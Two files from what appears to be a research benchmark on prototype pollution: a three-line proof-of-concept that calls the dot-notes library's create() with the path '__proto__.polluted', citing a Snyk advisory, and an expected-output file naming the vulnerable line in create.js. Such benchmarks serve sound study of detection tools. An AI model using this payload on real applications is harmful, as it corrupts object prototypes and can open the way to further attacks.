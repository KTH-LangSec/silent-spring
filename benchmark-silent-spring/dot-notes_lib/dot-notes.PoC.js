//https://snyk.io/vuln/SNYK-JS-DOTNOTES-598668
const dots = require("dot-notes");
dots.create({}, "__proto__.polluted", "yes");
