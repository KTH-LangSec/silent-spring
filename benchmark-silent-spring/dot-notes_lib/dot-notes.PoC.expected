node_modules/dot-notes/lib/create.js:43:3:43:5
